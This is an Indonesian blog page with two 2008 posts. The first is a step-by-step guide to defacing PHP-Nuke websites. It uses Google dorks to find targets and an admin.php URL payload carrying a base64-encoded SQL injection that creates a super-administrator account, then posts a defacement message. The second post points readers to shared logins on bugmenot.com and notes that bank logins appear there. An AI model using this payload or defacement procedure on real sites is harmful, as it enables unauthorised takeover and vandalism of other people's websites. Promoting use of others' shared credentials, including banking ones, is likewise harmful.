Senin, November 17, 2008

Langkah-Langkah deFace

Deface situs php nuke

Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=chercut&add_name=
God&add_pwd=chercut&add_email=
chercut@in.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox





misal : www.target.com/nuke/admin.php?op=
AddAuthor&add_aid=chercut&add_name=
God&add_pwd=chercut&add_email=
chercut@in.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox



Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=chercut => liat yg diatas tadi
password=chercut => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),
Kolom title =>

Kolom content =>

Kolom expiration => unlimited
trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

===============================================================

Baca Selengkapnya
Diposting oleh cHer di 2:04:00 AM

password fs, yahoo, blogger, wodpress, dLL

Halo.. kali ini saya akan sharing password dari beragam website - website, mulai dari password Friendster, Yahoo, Blogger, Wodpress, Majalah Popular dan masih banyak lagi. Untuk website lainnya dapat dicari sendiri nantinya. Ok cukup deh basa - basinya, paragraph awalnya dah penuh silahkan simak yang berikut ini.



Semua password disini sebenarnya memang sengaja dibuat oleh orang untuk dishare. Artinya si pemilik account memang ingin men-share passwordnya. Yang ingin saya katakan disini adalah hal ini LEGAL. Mengapa begitu? adalah konsep dari bugmenot.com yang bertujuan agar pengguna internet dapat melihat kontent yang diblokir dari suatu website yang bukan usernya.

Hehehe.. maaf ya yang sudah mengira ini adalah teknik hacking.. ini cuma sekedar sharing password saja kok tanpa membutuhkan teknik hacking, yang dibutuhkan hanyalah rasa ingin membagi

Ok saya lanjut, ketika anda mendapati konten unik dan ingin melihatnya, tapi anda diganggu dengan permintaan untuk mendaftar terlebih dahulu, nah ini yg ingin dihilangkan bugmenot.com. Metodenya adalah sharing username dan password sesama pengunjungnya.

Meski begitu, bugmenot.com melarang user untuk men-sharing password yang berasal dari website komersial (berbayar) namun entah kenapa website Bank BCA, klikbca.com masih masuk dalam daftar share.

Untuk akurasinya bisa dibilang 50:50, biasanya password baru yang masih akurat, setelah digunakan beberapa orang ada saja yang iseng menggantinya sehingga password tersebut invalid. Ingin coba? silahkan saja lihat:

Password Friendster Password Yahoo Password Blogger Password Wordpress

===================================================================


Baca Selengkapnya
Diposting oleh cHer di 1:20:00 AM